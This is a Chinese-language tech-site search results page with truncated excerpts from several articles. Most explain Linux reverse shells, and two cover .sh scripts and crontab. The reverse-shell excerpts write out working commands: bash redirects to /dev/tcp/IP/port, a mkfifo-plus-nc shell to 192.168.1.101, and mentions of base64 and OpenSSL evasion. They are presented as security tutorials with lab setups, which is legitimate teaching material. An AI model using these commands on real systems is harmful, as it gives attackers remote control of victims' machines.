首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Linux反弹shell

bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的...IP地址 2345:反弹到的端口 上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到 image.png 攻击机使用 nc -lvp...2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令 1.2second bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 这种就是交互式...&1 2>&1 和上面的效果一样 1.4fourth bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 值得一提的是,">&"相当于"2>&1",标准错误输出 一个标准的反弹

10.4K00

Linux .sh文件

Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。它能运行主要的UNIX工具软件、应用程序和网络协议。...Linux继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统。linux中.sh文件是什么?linux中.sh文件是脚本文件,一般都是bash脚本。...想运行的话就用sh命令运行sh xxx.sh。注:sh或是执行脚本,或是切换到sh这个bash里,默认的shell是bash。...当然,linuxsh是链接到bash上的,所以sh与bash在功能上是没有区别的。...还有就是在执行脚本的时候是用sh + 脚本名的方式来执行,其实,大部分的时候,简单脚本只要权限设置正确,可以直接执行,不需要sh命令的。

9.3K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Linux入侵 反弹shell

    二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....使用 bash -i &> /dev/tcp/10.42.0.1 0<&1 同样能反弹一个可交互的shell。...最后建立了一个子进程,传入参数“-i”使bash以交互模式启动。这个时候我们的输入输出都会被重定向到socket,黑客就可以执行命令了。 我们可以看到成功的弹回了一个shell

    6.2K30

    nc 反弹shell ​| Linux 后门系列

    ---- 关于nc之前文章就已经讲过了,不过我发现不同 linux 的nc不太一样 ?...原理其实就是管道技术 参考文章: https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的,不过最近研究了这些...Linux 后门之后发现我竟然对这些命令有些犹豫(其实就是学艺不精啦) 我对这个 rm -f /tmp/f 就十分不理解,实验之后我发现,没错,就是删除 /tmp/f 这个文件,没啥特殊的,就是怕mkfifo.../tmp/f 这里实现的是bind shell,我们希望的是反弹shell,简单变个型吧: rm -f /tmp/f; mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2...同样的,我们拆分一下 nc 192.168.1.101 5555 连接192.168.1.101 的 5555 端口 | /bin/sh | 将前面的连接输出传递给 /bin/sh 输入,并将执行的结果输出

    3K30

    WEB安全基础 - - -Linux反弹shell

    目录 一,Shell简介 正向shell(客户端想要获得服务端的shell) 反向shell (服务端想要获得客户端的shell)  二,Linux反弹shell 1.NC正向shell    2.NC...反向shell ​编辑 3.bash反弹shell  4.无e参数反弹shell  5.Base64编码绕过 ​编辑 6.Telnet反弹shell  7.OpenSSL反弹443端口,流量加密传输 一...二,Linux反弹shell 实验环境 目标机器:Ubuntu、IP:10.1.1.200、ssh账号密码root/root 攻击机器:Kali、IP:10.1.1.100 1.NC正向shell.../dev/tcp/10.10.1.11/6666 传递的数据作为交互式shell的输入,命令执行后的结果输出到 /dev/tcp/10.10.1.11/6666 //     /dev/tcp/是Linux...openssl s_server -quiet -key key.pem -cert cert.pem -port 443  // 在控制端上启动监视器  被控端: mkfifo /tmp/s;/bin/sh

    1.5K20

    Linux重定向及反弹shell详解

    这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell 目录 0x01 文件描述符 0x02 重定向 0x03 反弹shell 0x04 交互重定向 0x05 命令变形 0x01...文件描述符 Linux的文件描述符有以下三种 标准输入:0 标准输出:1 错误输出:2 对于文件描述符就先知道这些就可以了,具体的使用会在重定向中来说,重定向就是对文件描述符的操作 0x02 重定向...0x03 反弹shell 下面是很常见的一条反弹shell命令,我们就以这个为例来进行解释 bash -i >& /dev/tcp/ip/port 0>&1 解释 bash -i 表示创建一个交互式的...首先我们在本地开启监听,然后在Linux机器上输入下面的命令,即将指定字符发送到192.168.6.1的3333端口 ? ?

    1.3K10

    Linux】crontab使用举例——.sh脚本与Python脚本

    crontab是Linux一个定时执行特定任务的程序,网上也有很多使用教程,在这里举一个例子,抛砖引玉。 为了运行.py,建议使用.sh脚本批量运行,并且在.sh内输出日志。...Ubuntu系统crontab设置请参考: https://www.linuxidc.com/Linux/2013-05/84770.htm 建立.sh文件 在目录下新建xxx.sh文件,内容为:.../bin/sh . ~/.bash_profile python /home/price-monitor-server/conn_sql.py ---- 第一行是输出标准日志到crawl_log...第二行是输出标准错误日志到crawl_log_err 第三与第四行是为了实行.sh而设置的环境 第四行及之后就可以执行.py啦 设置crontab 在/var/spool/cron/(你的用户名)文件中添加一行...: */15 * * * * cd /home/xxxxx && sh crawl_item.sh 代表每15分钟去往/home/xxxxxx目录执行一次crawl_item.sh 由于日志在.sh中已经输出

    2.6K10
    领券